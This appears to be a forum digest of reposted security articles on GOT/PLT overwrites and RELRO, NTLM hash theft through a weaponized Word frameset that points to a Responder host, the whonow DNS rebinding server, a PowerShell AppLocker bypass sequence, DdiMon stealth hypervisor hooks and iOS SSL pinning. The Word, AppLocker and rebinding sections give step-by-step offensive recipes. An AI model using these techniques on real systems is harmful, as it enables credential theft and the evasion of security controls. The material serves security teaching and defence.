Alright, well now that we think we know how this all works, how can I, as a pwner, make use of this? Well, pwning usually involves taking control of the flow of execution of a program. Let’s look at the permissions of the sections we’ve been dealing with:

    Section Headers:
      [Nr] Name      Type      Addr     Off    Size   ES Flg Lk Inf Al
      [12] .plt      PROGBITS  080482f0 0002f0 000040 04  AX  0   0 16
      [13] .plt.got  PROGBITS  08048330 000330 000008 00  AX  0   0  8
      [14] .text     PROGBITS  08048340 000340 0001a2 00  AX  0   0 16
      [23] .got      PROGBITS  08049ffc 000ffc 000004 04  WA  0   0  4
      [24] .got.plt  PROGBITS  0804a000 001000 000018 04  WA  0   0  4
    Key to Flags:
      W (write), A (alloc), X (execute), M (merge), S (strings), I (info),

We’ll note that, as is typical for a system supporting NX, no section has both the Write and eXecute flags enabled.
So we won’t be overwriting any executable sections, but we should be used to that.

On the other hand, the .got.plt section is basically a giant array of function pointers! Maybe we could overwrite one of these and control execution from there. It turns out this is quite a common technique, as described in a 2001 paper from team teso. (Hey, I never said the technique was new.) Essentially, any memory corruption primitive that will let you write to an arbitrary (attacker-controlled) address will allow you to overwrite a GOT entry.

Mitigations

So, since this exploit technique has been known for so long, surely someone has done something about it, right? Well, it turns out yes, there’s been a mitigation since 2004. Enter relocations read-only, or RELRO. It in fact has two levels of protection: partial and full RELRO.

Partial RELRO (enabled with -Wl,-z,relro):

- Maps the .got section as read-only (but not .got.plt).
- Rearranges sections to reduce the likelihood of global variables overflowing into control structures.

Full RELRO (enabled with -Wl,-z,relro,-z,now):

- Does the steps of Partial RELRO, plus:
- Causes the dynamic linker to resolve all symbols at load time (before starting execution) and then remove write permissions from .got.
- .got.plt is merged into .got with full RELRO, so you won’t see this section name.

Only full RELRO protects against overwriting function pointers in .got.plt. It works by causing the linker to immediately look up every symbol in the PLT and update the addresses, then mprotect the page to no longer be writable.

Summary

The .got.plt is an attractive target for printf format string exploitation and other arbitrary write exploits, especially when your target binary lacks PIE, causing the .got.plt to be loaded at a fixed address. Enabling Full RELRO protects against these attacks by preventing writing to the GOT.
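The effect of full RELRO described above (fill in the table, then mprotect it to read-only) can be imitated on a small scale. The sketch below is only a model under stated assumptions: make_readonly_table and answer are hypothetical names, the "table" is an anonymous page obtained with mmap rather than a real GOT, and it targets Linux or another POSIX system.

```c
#define _DEFAULT_SOURCE  /* for MAP_ANONYMOUS under strict -std= modes */
#include <assert.h>
#include <stddef.h>
#include <sys/mman.h>
#include <unistd.h>

typedef int (*func_ptr)(void);

/* Stand-in for a resolved library function. */
static int answer(void) { return 42; }

/* Allocate one page to act as a toy GOT, fill slot 0 while the page is
 * still writable, then drop write permission. Returns the table on
 * success or NULL on failure. */
func_ptr *make_readonly_table(void)
{
    long page = sysconf(_SC_PAGESIZE);
    if (page <= 0)
        return NULL;

    void *mem = mmap(NULL, (size_t)page, PROT_READ | PROT_WRITE,
                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (mem == MAP_FAILED)
        return NULL;

    func_ptr *table = (func_ptr *)mem;
    table[0] = answer;               /* "resolve" everything up front */

    /* From here on, any write to the table faults (SIGSEGV). */
    if (mprotect(mem, (size_t)page, PROT_READ) != 0) {
        munmap(mem, (size_t)page);
        return NULL;
    }
    return table;
}
```

Calls through the table still work after the permission change, since reading the pointer is all a call needs. An attempted overwrite such as table[0] = something_else would crash the process instead of redirecting execution, which is the property full RELRO relies on.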
References

- ELF Format Reference
- Examining Dynamic Linking with GDB
- RELRO - A (not so well known) Memory Corruption Mitigation Technique
- What is the symbol and the global offset table?
- How the ELF ruined Christmas

Source: https://systemoverlord.com/2017/03/19/got-and-plt-for-pwning.html
  14. Microsoft Office – NTLM Hashes via Frameset

December 18, 2017

Microsoft Office documents play a vital role in red team assessments, as they are usually used to gain an initial foothold on the client’s internal network. Staying under the radar is a key element as well, and this can only be achieved by abusing legitimate functionality of Windows or of a trusted application such as Microsoft Office.

Historically Microsoft Word was used as an HTML editor. This means that it can support HTML elements such as framesets. It is therefore possible to link a Microsoft Word document with a UNC path and combine this with Responder in order to capture NTLM hashes externally. A Word document with the docx extension is actually a zip file which contains various XML documents. These XML files control the theme, the fonts, the settings of the document and the web settings. Using 7-zip it is possible to open that archive in order to examine these files:

[Figure: Docx Contents]

The word folder contains a file called webSettings.xml. This file needs to be modified in order to include the frameset.

[Figure: webSettings File]

Adding the following code will create a link with another file.

    <w:frameset>
      <w:framesetSplitbar>
        <w:w w:val="60"/>
        <w:color w:val="auto"/>
        <w:noBorder/>
      </w:framesetSplitbar>
      <w:frameset>
        <w:frame>
          <w:name w:val="3"/>
          <w:sourceFileName r:id="rId1"/>
          <w:linkedToFile/>
        </w:frame>
      </w:frameset>
    </w:frameset>

[Figure: webSettings XML – Frameset]

The new webSettings.xml file which contains the frameset needs to be added back to the archive so that the previous version is overwritten.

[Figure: webSettings with Frameset – Adding new version to archive]

A new file (webSettings.xml.rels) must be created in order to contain the relationship ID (rId1), the UNC path, and the TargetMode, which states whether the target is external or internal.

    <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
    <Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
      <Relationship Id="rId1"
        Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/frame"
        Target="\\192.168.1.169\Microsoft_Office_Updates.docx"
        TargetMode="External"/>
    </Relationships>

[Figure: webSettings XML Relationship File – Contents]

The _rels directory contains the associated relationships of the document in terms of fonts, styles, themes, settings etc. Planting the new file in that directory will finalize the relationship link which has been created previously via the frameset.

[Figure: webSettings XML rels]

Now that the Word document has been weaponized to connect to a UNC path over the Internet, Responder can be configured in order to capture the NTLM hashes.

    responder -I wlan0 -e 192.168.1.169 -b -A -v

[Figure: Responder Configuration]

Once the target user opens the Word document, it will try to connect to the UNC path.

[Figure: Word – Connect to UNC Path via Frameset]

Responder will retrieve the NTLMv2 hash of the user.

[Figure: Responder – NTLMv2 Hash via Frameset]

Alternatively, Metasploit Framework can be used instead of Responder in order to capture the password hash.

    auxiliary/server/capture/smb

[Figure: Metasploit – SMB Capture Module]

NTLMv2 hashes will be captured in Metasploit upon opening the document.

[Figure: Metasploit SMB Capture Module – NTLMv2 Hash via Frameset]

Conclusion

This technique can allow the red team to grab domain password hashes from users, which can lead to internal network access if 2-factor authentication for VPN access is not enabled and there is a weak password policy. Additionally, if the target user is an elevated account such as local administrator or domain admin, then this method can be combined with SMB relay in order to obtain a Meterpreter session.

Source: https://pentestlab.blog/2017/12/18/microsoft-office-ntlm-hashes-via-frameset/
  15. Whonow DNS Server

A malicious DNS server for executing DNS Rebinding attacks on the fly. whonow lets you specify DNS responses and rebind rules dynamically using domain requests themselves.

    # respond to DNS queries for this domain with 52.23.194.42 the first time
    # it is requested and then 192.168.1.1 every time after that
    A.52.23.194.42.1time.192.168.1.1.forever.rebind.network

    # respond first with 52.23.194.42, then 192.168.1.1 the next five times,
    # and then start all over again (1, then 5, forever...)
    A.52.23.194.42.1time.192.168.1.1.5times.repeat.rebind.network

What's great about dynamic DNS Rebinding rules is that you don't have to spin up your own malicious DNS server to start exploiting the browser's Same-origin policy. Instead, everyone can share the same public whonow server.

Note: You should include UUIDs (e.g. a06a5856-1fff-4415-9aa2-823230b05826) as a subdomain in each DNS lookup to a whonow server. These have been omitted from examples in this README for brevity, but assume requests to *.rebind.network should be *.a06a5856-1fff-4415-9aa2-823230b05826.rebind.network. See the Gotchas section for more info as to why.

Subdomains = Rebind Rules

The beauty of whonow is that you can define the behavior of DNS responses via subdomains in the domain name itself. Using only a few simple keywords (A, (n)times, forever, and repeat) you can define complex and powerful DNS behavior.

Anatomy of a whonow request

    A.<ip-address>.<rule>[.<ip-address>.<rule>[.<ip-address>.<rule>]][.uuid/random-string].example.com

- A: The type of DNS request. Currently only A records are supported, but AAAA should be coming soon.
- <ip-address>: an IPv4 (IPv6 coming soon) address with each octet separated by a period (e.g. 192.168.1.1).
- <rule>: One of three rules:
  - (n)time: The number of times the DNS server should reply with the previous IP address. Accepts both plural and singular strings (e.g. 1time, 3times, 5000times).
  - forever: Respond with the previous IP address forever.
  - repeat: Repeat the entire set of rules starting from the beginning.
- [uuid/random-string]: A random string to keep DNS Rebind attacks against the same IP addresses separate from each other. See Gotchas for more info.
- example.com: A domain name you have pointing to a whonow nameserver, like the publicly available rebind.network whonow instance.

Rules can be chained together to form complex response behavior.

Examples

    # always respond with 192.168.1.1. This isn't really DNS rebinding
    # but it still works
    A.192.168.1.1.forever.rebind.network

    # alternate between localhost and 10.0.0.1 forever
    A.127.0.0.1.1time.10.0.0.1.1time.repeat.rebind.network

    # first respond with 192.168.1.1, then 192.168.1.2 twice, then
    # 192.168.1.3 forever
    A.192.168.1.1.1time.192.168.1.2.2times.192.168.1.3.forever.rebind.network

    # respond with 52.23.194.42 the first time, then whatever `whonow --default-answer`
    # is set to forever after that (default: 127.0.0.1)
    A.52.23.194.42.1time.rebind.network

Limitations

Each label [subdomain] may contain zero to 63 characters... The full domain name may not exceed the length of 253 characters in its textual representation. (from the DNS Wikipedia page)

Additionally, there may not be more than 127 labels/subdomains.

Gotchas

Use Unique Domain Names

Each unique domain name request to whonow creates a small state-saving program in the server's RAM. The next time that domain name is requested, the program counter increments and the state may be mutated. All unique domain names are their own unique program instances. To avoid clashing with other users or having your domain name program's state inadvertently incremented, you should add a UUID subdomain after your rule definitions. That UUID should never be reused.

    # this
    A.127.0.0.1.1time.10.0.0.1.1time.repeat.8f058b82-4c39-4dfe-91f7-9b07bcd7fbd4.rebind.network

    # not this
    A.127.0.0.1.1time.10.0.0.1.1time.repeat.rebind.network

--max-ram-domains

The program state associated with each unique domain name is stored by whonow in RAM. To avoid running out of RAM, an upper bound is placed on the number of unique domains whose program state can be managed at the same time. By default, this value is set to 10,000,000, but it can be configured with --max-ram-domains. Once this limit is reached, domain names and their saved program state will be removed in the order they were added (FIFO).

Running your own whonow server

To run your own whonow server in the cloud, use your domain name provider's admin panel to configure a custom nameserver pointing to your VPS. Then install whonow on that VPS and make sure it's running on port 53 (the default DNS port) and that port 53 is accessible to the Internet.

    # install
    npm install --cli -g whonow@latest

    # run it!
    whonow --port 53

If that ☝ is too much trouble, feel free to just use the public whonow server running on rebind.network.

Usage

    $ whonow --help
    usage: whonow [-h] [-v] [-p PORT] [-d DEFAULT_ANSWER] [-b MAX_RAM_DOMAINS]

    A malicious DNS server for executing DNS Rebinding attacks on the fly.

    Optional arguments:
      -h, --help            Show this help message and exit.
      -v, --version         Show program's version number and exit.
      -p PORT, --port PORT  What port to run the DNS server on (default: 53).
      -d DEFAULT_ANSWER, --default-answer DEFAULT_ANSWER
                            The default IP address to respond with if no rule is
                            found (default: "127.0.0.1").
      -b MAX_RAM_DOMAINS, --max-ram-domains MAX_RAM_DOMAINS
                            The number of domain name records to store in RAM at
                            once. Once the number of unique domain names queried
                            surpasses this number domains will be removed from
                            memory in the order they were requested. Domains that
                            have been removed in this way will have their program
                            state reset the next time they are queried (default:
                            10000000).

Testing

A whonow server must be running on localhost:15353 to perform the tests in test.js.

    # in one terminal
    whonow -p 15353

    # in another terminal
    cd path/to/node_modules/whonow
    npm test

Source: https://github.com/brannondorsey/whonow
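The rule semantics described in this README ((n)times, forever, repeat, and the default answer) can be modelled with a short function that maps "this is the Nth query for a domain" to the IP address to return. This is a sketch of the documented behavior only, written in C for illustration: whonow itself is a Node.js program, and rebind_rule, answer_for and FOREVER are hypothetical names that do not appear in its code. Parsing the domain name into rules is left out.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

#define FOREVER (-1)

/* One "<ip-address>.<rule>" pair from the domain name. */
struct rebind_rule {
    const char *ip;
    int times;      /* number of replies with this IP, or FOREVER */
};

/* Return the IP to answer with for the query-th lookup (0-based).
 * repeat != 0 models a trailing "repeat" keyword; default_ip models
 * the server's default answer once the rules are exhausted. */
const char *answer_for(const struct rebind_rule *rules, size_t n, int repeat,
                       const char *default_ip, unsigned long query)
{
    unsigned long cycle = 0;
    int has_forever = 0;
    size_t i;

    /* Length of one full pass through the rules, unless a "forever"
     * rule makes the pass never end. */
    for (i = 0; i < n; i++) {
        if (rules[i].times == FOREVER) {
            has_forever = 1;
            break;
        }
        cycle += (unsigned long)rules[i].times;
    }

    /* With "repeat", later queries wrap around to the first rule. */
    if (repeat && !has_forever && cycle > 0)
        query %= cycle;

    /* Walk the rules, consuming each rule's reply budget in turn. */
    for (i = 0; i < n; i++) {
        if (rules[i].times == FOREVER)
            return rules[i].ip;
        if (query < (unsigned long)rules[i].times)
            return rules[i].ip;
        query -= (unsigned long)rules[i].times;
    }
    return default_ip;
}
```

For example, the rules for A.127.0.0.1.1time.10.0.0.1.1time.repeat would be the two pairs ("127.0.0.1", 1) and ("10.0.0.1", 1) with repeat set, so queries 0, 1, 2, 3 alternate between the two addresses. The per-domain query counter is the state that the Gotchas section says is kept in RAM.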
  16. Executing Commands and Bypassing AppLocker with PowerShell Diagnostic Scripts

JANUARY 7, 2018 ~ BOHOPS

Introduction

Last week, I was hunting around the Windows Operating System for interesting scripts and binaries that may be useful for future penetration tests and Red Team engagements. With increased client-side security, awareness, and monitoring (e.g. AppLocker, Device Guard, AMSI, PowerShell ScriptBlock Logging, PowerShell Constrained Language Mode, User Mode Code Integrity, HIDS/anti-virus, the SOC, etc.), looking for ways to deceive, evade, and/or bypass security solutions has become a significant component of the ethical hacker’s playbook.

While hunting, I came across an interesting directory structure that contained diagnostic scripts located at the following ‘parent’ path:

    %systemroot%\diagnostics\system\

In particular, two subdirectories (\AERO) and (\Audio) contained two very interesting, signed PowerShell scripts:

- CL_Invocation.ps1
- CL_LoadAssembly.ps1

CL_Invocation.ps1 provides a function (SyncInvoke) to execute binaries through System.Diagnostics.Process, and CL_LoadAssembly.ps1 provides two functions (LoadAssemblyFromNS and LoadAssemblyFromPath) for loading .NET/C# assemblies (DLLs/EXEs).

Analysis of CL_Invocation.ps1

While investigating this script, it was quite apparent that executing commands would be very easy. Importing the module and using SyncInvoke is pretty straightforward, and command execution is successfully achieved through:

    . CL_Invocation.ps1 (or import-module CL_Invocation.ps1)
    SyncInvoke <command> <arg...>

However, further research and subsequent testing indicated that this technique did not bypass any protections. PowerShell Constrained Language Mode (in PSv5) prevented the execution of certain PowerShell code/scripts, and default AppLocker policies prevented the execution of unsigned binaries under the context of an unprivileged account. Still, CL_Invocation.ps1 may have merit within trusted execution chains and for evading defender analysis when combined with other techniques.

**Big thanks to @Oddvarmoe and @xenosCR for their help and analysis of CL_Invocation

Analysis of CL_LoadAssembly.ps1

While investigating CL_LoadAssembly, I found a very interesting write-up (Applocker Bypass-Assembly Load) by @netbiosX that describes research presented by Casey Smith (@subTee) at ShmooCon 2015. He successfully discovered an AppLocker bypass through the use of loading assemblies within PowerShell by URL, file location, and byte code. Additionally, @subTee alluded to a bypass technique with CL_LoadAssembly in a Tweet posted a few years ago.

In order to test this method, I compiled a very basic program (assembly) in C# (Target Framework: .NET 2.0) that I called funrun.exe, which runs calc.exe via proc.start() if (successfully) executed.

Using a Windows 2016 machine with default AppLocker rules under an unprivileged user context, the user attempted to execute funrun.exe directly. When called on the command line and in PowerShell (v5), this was prevented by policy. Funrun.exe was also prevented by policy when run under PowerShell version 2.

Using CL_LoadAssembly, the user successfully loads the assembly with a path traversal call to funrun.exe. However, Constrained Language mode prevented the user from calling the method in PowerShell (v5).

To bypass Constrained Language mode, the user invokes PowerShell v2 and successfully loads the assembly with a path traversal call to funrun.exe. The user then calls the funrun assembly method and spawns calc.exe.

Success! As an unprivileged user, we proved that we could bypass Constrained Language mode by invoking PowerShell version 2 (Note: this must be enabled) and bypass AppLocker by loading an assembly through CL_LoadAssembly.ps1. For completeness, here is the CL sequence:

    powershell -v 2 -ep bypass
    cd C:\windows\diagnostics\system\AERO
    import-module .\CL_LoadAssembly.ps1
    LoadAssemblyFromPath ..\..\..\..\temp\funrun.exe
    [funrun.hashtag]::winning()

AppLocker Bypass Resources

For more information about AppLocker bypass techniques, I highly recommend checking out The Ultimate AppLocker Bypass List created and maintained by Oddvar Moe (@Oddvarmoe). Also, these resources were very helpful while drafting this post:

- AppLocker Bypass-Assembly Load – https://pentestlab.blog/tag/assembly-load/
- C# to Windows Meterpreter in 10 min – https://holdmybeersecurity.com/2016/09/11/c-to-windows-meterpreter-in-10mins/

Conclusion

Well folks, that covers interesting code execution and AppLocker bypass vectors to incorporate into your red team/pen test engagements. Please feel free to contact me or leave a message if you have any other questions/comments. Thank you for reading!

Source: https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/
  17. Pentester Academy TV

Published on 28 Mar 2018

Today's episode of The Tool Box features NetRipper. We break down everything you need to know, including what it does, who it was developed by, and the best ways to use it!

Check out NetRipper here: GitHub - https://github.com/NytroRST/NetRipper

Send your tool to media@pentesteracademy.com for consideration.

Thanks for watching and don't forget to subscribe to our channel for the latest cybersecurity news! Visit Hacker Arsenal for the latest attack-defense gadgets! https://www.hackerarsenal.com/

Follow us on:
~Facebook: http://bit.ly/2uS4pK0
~Twitter: http://bit.ly/2vd5QSE
~Instagram: http://bit.ly/2v0tnY8
~LinkedIn: http://bit.ly/2ujkyeC
~Google +: http://bit.ly/2tNFXtc
~Web: http://bit.ly/29dtbcn
  18. DdiMon

Introduction

DdiMon is a hypervisor performing inline hooking that is invisible to a guest (i.e., any code other than DdiMon) by using the extended page table (EPT).

DdiMon is meant to be an educational tool for understanding how to use EPT from a programming perspective for research. To demonstrate it, DdiMon installs invisible inline hooks on the following device driver interfaces (DDIs) to monitor activities of the Windows built-in kernel patch protection, a.k.a. PatchGuard, and to hide certain processes without being detected by PatchGuard.

- ExQueueWorkItem
- ExAllocatePoolWithTag
- ExFreePool
- ExFreePoolWithTag
- NtQuerySystemInformation

Those stealth shadow hooks are hidden from the guest's read and write memory operations and exposed only on execution of the memory. Therefore, they are neither visible nor overwritable from a guest, while they function as ordinary hooks. This is accomplished by using EPT to make a guest see different memory contents from what it would see if EPT were not in use. This technique is often called memory shadowing. For more details, see the Design section below.

Here is a movie demonstrating that shadow hooks allow you to monitor and control DDI calls without being noticed by PatchGuard.

https://www.youtube.com/watch?v=UflyX3GeYkw

DdiMon is implemented on top of HyperPlatform. See the project page for more details of HyperPlatform:

https://github.com/tandasat/HyperPlatform

Installation and Uninstallation

Clone the full source code from GitHub with the command below and compile it in Visual Studio.

    $ git clone --recursive https://github.com/tandasat/DdiMon.git

On the x64 platform, you have to enable test signing to install the driver. To do that, open the command prompt with administrator privileges and type the following command, and then restart the system to activate the change:

    >bcdedit /set testsigning on

To install and uninstall the driver, use the 'sc' command. For installation:

    >sc create DdiMon type= kernel binPath= C:\Users\user\Desktop\DdiMon.sys
    >sc start DdiMon

And for uninstallation:

    >sc stop DdiMon
    >sc delete DdiMon
    >bcdedit /deletevalue testsigning

Note that the system must support Intel VT-x and EPT technology to successfully install the driver.

To install the driver on a virtual machine on VMware Workstation, see the "Using VMware Workstation" section in the HyperPlatform User Document.

http://tandasat.github.io/HyperPlatform/userdocument/

Output

All logs are printed out to DbgView and saved in C:\Windows\DdiMon.log.

Motivation

Despite the existence of plenty of academic research projects[1,2,3] and production software[4,5], EPT (a.k.a. SLAT; second-level address translation) is still an underused technology among reverse engineers due to the lack of information on how it works and how to control it through programming.

MoRE[6] by Jacob Torrey is one of very few open source projects demonstrating the use of EPT with a small amount of code. While we recommend looking into the project for a basic comprehension of how EPT can be initialized and used to set up more than a 1:1 guest to machine physical memory mapping, MoRE lacks the flexibility to extend its code for supporting broader platforms and implementing your own analysis tools.

DdiMon provides a similar sample use of EPT to what MoRE does, with a greater range of platform support such as x64 and/or Windows 10. DdiMon can also be seen as an example extension of HyperPlatform for memory virtualization.
[1] SecVisor: A Tiny Hypervisor to Provide Lifetime Kernel Code Integrity for Commodity OSes - https://www.cs.cmu.edu/~arvinds/pubs/secvisor.pdf
[2] SPIDER: Stealthy Binary Program Instrumentation and Debugging via Hardware Virtualization - https://www.cerias.purdue.edu/assets/pdf/bibtex_archive/2013-5.pdf
[3] Dynamic VM Dependability Monitoring Using Hypervisor Probes - http://assured-cloud-computing.illinois.edu/files/2014/03/Dynamic-VM-Dependability-Monitoring-Using-Hypervisor-Probes.pdf
[4] Windows 10 Virtualization-based Security (Device Guard) - https://technet.microsoft.com/en-us/library/mt463091(v=vs.85).aspx
[5] VMRay - https://www.vmray.com/features/
[6] MoRE - https://github.com/ainfosec/MoRE

Design

In order to install a shadow hook, DdiMon creates two copies of the page that contains the address to be hooked. After DdiMon is initialized, those two pages are accessed instead of the original page whenever a guest (that is, any code other than the hypervisor, DdiMon) attempts to access the original page.

For example, when DdiMon installs a hook onto 0x1234, two copied pages are created: 0xa000 for execution access and 0xb000 for read or write access, and memory access is performed as below after the hook is activated:

Requested -> Accessed
By Hypervisor: 0x1234 -> 0x1234 on all access
By Guest: 0x1234 -> 0xa234 on execution access
By Guest: 0x1234 -> 0xb234 on read or write access

The following explains how it is accomplished.

Default state

DdiMon first configures the EPT entry corresponding to 0x1000-0x1fff to refer to the contents of 0xa000 and to disallow read and write access to the page.

Scenario: Read or Write

With this configuration, any read or write access triggers an EPT violation VM-exit. Upon the VM-exit, the EPT entry for 0x1000-0x1fff is modified to refer to the contents of 0xb000, which is a copy of 0x1000, and to allow read and write access to the page.
The hypervisor then sets the Monitor Trap Flag (MTF), which works like the Trap Flag of the flags register but is not visible to a guest, so that the guest can perform the read or write operation and is then interrupted by the hypervisor with an MTF VM-exit.

After executing a single instruction, the guest is interrupted by the MTF VM-exit. On this VM-exit, the hypervisor clears the MTF and resets the EPT entry to the default state so that subsequent execution is done with the contents of 0xa000.

As a result of this sequence of operations, the guest has executed a single instruction reading from or writing to 0xb234.

Scenario: Execute

In the default state, execution is done against the contents of 0xa000 without triggering any events unless other settings are made. In order to monitor execution of 0xa234 (0x1234 from the guest's perspective), DdiMon sets a breakpoint (0xcc) at 0xa234 and handles #BP in the hypervisor. The following steps show how DdiMon hooks execution of 0xa234.

On a #BP VM-exit, the hypervisor first checks whether the guest's EIP/RIP is 0x1234. If so, the hypervisor changes the contents of the register to point to the corresponding hook handler for instrumenting the DDI call.

On VM-enter, the guest executes the hook handler. The hook handler calls the original function, examines parameters, return values and/or the return address, and takes action accordingly.

This is just like typical inline hooking. The only differences are that it sets 0xcc and changes EIP/RIP from a hypervisor instead of overwriting original code with JMP instructions, and that installed hooks are not visible from a guest. An advantage of using 0xcc is that it does not require the target function to be long enough to hold JMP instructions.

Implementation

The following is the call hierarchy for the sequences explained above.
On DriverEntry
DdimonInitialization()
DdimonpEnumExportedSymbolsCallback() // Enumerates exports of ntoskrnl
ShInstallHook() // Installs a stealth hook
ShEnableHooks() // Activates installed hooks
ShEnablePageShadowing()
ShpEnablePageShadowingForExec() // Configures an EPT entry as explained in "Default state"

On EPT violation VM-exit with read or write
VmmpHandleEptViolation()
EptHandleEptViolation()
ShHandleEptViolation() // Performs actions as explained in step 1 of "Scenario: Read or Write"

On MTF VM-exit
VmmpHandleMonitorTrap()
ShHandleMonitorTrapFlag() // Performs actions as explained in step 2 of "Scenario: Read or Write"

On #BP VM-exit
VmmpHandleException()
ShHandleBreakpoint() // Performs actions as explained in step 1 of "Scenario: Execute"

Implemented Hook Handlers

ExQueueWorkItem - The hook handler prints out the given parameters when the specified work item routine is not inside any image.
ExAllocatePoolWithTag - The hook handler prints out the given parameters and the return value of ExAllocatePoolWithTag() when it is called from an address that is not backed by any image.
ExFreePool and ExFreePoolWithTag - The hook handlers print out the given parameters when they are called from addresses that are not backed by any image.
NtQuerySystemInformation - The hook handler removes the entry for "cmd.exe" from the returned process information so that cmd.exe is not listed by process enumeration.

The easiest way to see those logs is to install NoImage.sys.
https://github.com/tandasat/MemoryMon/tree/master/MemoryMonTest

Logs for the activities of NoImage look like this:

17:59:23.014 INF #0 4 48 System 84660265: ExFreePoolWithTag(P= 84665000, Tag= nigm)
17:59:23.014 INF #0 4 48 System 84660283: ExAllocatePoolWithTag(POOL_TYPE= 00000000, NumberOfBytes= 00001000, Tag= nigm) => 8517B000
17:59:23.014 INF #0 4 48 System 8517B1C3: ExQueueWorkItem({Routine= 8517B1D4, Parameter= 8517B000}, 1)

Caveats

DdiMon is meant to be an educational tool, not robust, production-quality software that is able to handle various edge cases. For example, DdiMon does not handle self-modifying code, since memory writes to a shadowed page are not reflected in the view used for execution. For this reason, researchers are encouraged to use this project as sample code to get familiar with EPT and develop their own tools as needed.

Supported Platforms

x86 and x64 Windows 7, 8.1 and 10
The system must support Intel VT-x and EPT

License

This software is released under the MIT License, see LICENSE.

Sursa: https://github.com/tandasat/DdiMon
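The read/write and execute scenarios from the Design section above can be modelled in a few lines of Python. This is only a toy simulation under stated assumptions, not DdiMon's code: the class `ShadowedPage`, its method names and the event strings are hypothetical, and real EPT handling happens in the hypervisor's VM-exit handlers rather than in Python objects.

```python
PAGE_SIZE = 0x1000
BREAKPOINT = 0xCC


class ShadowedPage:
    """Toy model of one shadowed guest page (hypothetical, for illustration)."""

    def __init__(self, original: bytes, hook_offset: int):
        self.rw_view = bytearray(original)    # plays the role of 0xb000
        self.exec_view = bytearray(original)  # plays the role of 0xa000
        self.exec_view[hook_offset] = BREAKPOINT
        self.hook_offset = hook_offset
        self.active_view = "exec"   # default state: EPT entry -> exec view
        self.rw_allowed = False     # default state: read/write disallowed
        self.mtf = False
        self.events = []

    def _ept_violation(self):
        # Switch the entry to the read/write copy and arm the Monitor Trap Flag.
        self.events.append("EPT violation VM-exit")
        self.active_view, self.rw_allowed, self.mtf = "rw", True, True

    def _monitor_trap(self):
        # After one guest instruction, go back to the default state.
        self.events.append("MTF VM-exit")
        self.active_view, self.rw_allowed, self.mtf = "exec", False, False

    def guest_read(self, offset: int) -> int:
        self._ept_violation()
        value = self.rw_view[offset]   # the single guest instruction
        self._monitor_trap()
        return value

    def guest_write(self, offset: int, value: int) -> None:
        self._ept_violation()
        self.rw_view[offset] = value   # never reaches the exec view
        self._monitor_trap()

    def guest_execute(self, offset: int) -> str:
        if offset == self.hook_offset and self.exec_view[offset] == BREAKPOINT:
            self.events.append("#BP VM-exit")
            return "hook_handler"      # the hypervisor redirects EIP/RIP
        return "original_code"


page = ShadowedPage(bytes([0x90]) * PAGE_SIZE, hook_offset=0x234)
print(hex(page.guest_read(0x234)))   # the guest sees the original byte
print(page.guest_execute(0x234))     # execution reaches the hook handler
```

Because `guest_write` only touches the read/write copy, the model also reproduces the caveat about self-modifying code: a write to the shadowed page never changes what is executed.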
  19. Prevent bypassing of SSL certificate pinning in iOS applications TECHNOLOGY iOS By: Dennis Frett - Software engineer One of the first things an attacker will do when reverse engineering a mobile application is to bypass the SSL/TLS (Secure Sockets Layer/Transport Layer Security) protection to gain a better insight in the application’s functioning and the way it communicates with its server. In this blog, we explain which techniques are used to bypass SSL pinning in iOS and which countermeasures can be taken. What is SSL pinning? When mobile apps communicate with a server, they typically use SSL to protect the transmitted data against eavesdropping and tampering. By default, SSL implementations used in apps trust any server with certificate trusted by the operating system’s trust store. This store is a list of certificate authorities that is shipped with the operating system. With SSL pinning, however, the application is configured to reject all but one or a few predefined certificates. Whenever the application connects to a server, it compares the server certificate with the pinned certificate(s). If and only if they match, the server is trusted and the SSL connection is established. Why do we need SSL pinning? Setting up and maintaining SSL sessions is usually delegated to a system library. This means that the application that tries to establish a connection does not determine which certificates to trust and which not. The application relies entirely on the certificates that are included in the operating system’s trust store. A researcher who generates a self-signed certificate and includes it in the operating system's trust store can set up a man-in-the-middle attack against any app that uses SSL. This would allow him to read and manipulate every single SSL session. The attacker could use this ability to reverse engineer the protocol the app uses or to extract API keys from the requests. 
Attackers can also compromise SSL sessions by tricking the user into installing a trusted CA through a malicious web page. Or the root CAs trusted by the device can get compromised and be used to generate certificates. Narrowing the set of trusted certificates through the implementation of SSL pinning effectively protects applications from the described remote attacks. It also prevents reverse engineers from adding a custom root CA to the store of their own device to analyze the functionality of the application and the way it communicates with the server. SSL pinning implementation in iOS SSL pinning is implemented by storing additional information inside the app to identify the server and ensure that no man-in-the-middle attack is being carried out. What to pin? Either the actual server certificate itself or the public key of the server is pinned. You can opt to store the exact data or a hash of that data. This can be a file hash of the certificate file or a hash of the public key string. The choice between pinning the certificate or the public key has a few implications for security and maintenance of the application. This lies outside the scope of this blog, but more information can be found here. Embedding pinned data The data required for SSL pinning can be embedded in the application in two ways: in an asset file or as a string in the actual code of the app. If you pin the certificate file, the certificate is usually embedded as an asset file. Each time an SSL connection is made, the received server certificate is compared to the known certificate(s) file(s). Only if the files match exactly, the connection is trusted. When pinning the public key of the server, the key can be embedded as a string in the application code or it can be stored in an asset file. Whenever an SSL connection is made, the public key is extracted from the received server certificate and compared to the stored string. If the strings match exactly, the connection is trusted. 
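The public key comparison described above can be sketched as follows. This is a minimal illustration, assuming the pin is stored as a base64-encoded SHA-256 hash of the server's public key bytes; the function names `spki_pin` and `is_pinned` and the sample key bytes are hypothetical, and extracting the public key from a received certificate is left out.

```python
import base64
import hashlib
import hmac


def spki_pin(public_key_der: bytes) -> str:
    """Return the base64-encoded SHA-256 hash of the public key bytes."""
    digest = hashlib.sha256(public_key_der).digest()
    return base64.b64encode(digest).decode("ascii")


def is_pinned(public_key_der: bytes, pinned_hashes) -> bool:
    """Trust the connection only if the key's hash matches a stored pin exactly."""
    candidate = spki_pin(public_key_der)
    # compare_digest avoids leaking how many leading characters matched.
    return any(hmac.compare_digest(candidate, pin) for pin in pinned_hashes)


# Placeholder bytes standing in for a real DER-encoded public key.
server_key = b"placeholder public key bytes"
pins = [spki_pin(server_key)]

print(is_pinned(server_key, pins))                # key matches a pin
print(is_pinned(b"attacker key bytes", pins))     # key does not match
```

Storing a hash rather than the raw key keeps the embedded value short and fixed in length, which is one reason hashed pins are a common choice.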
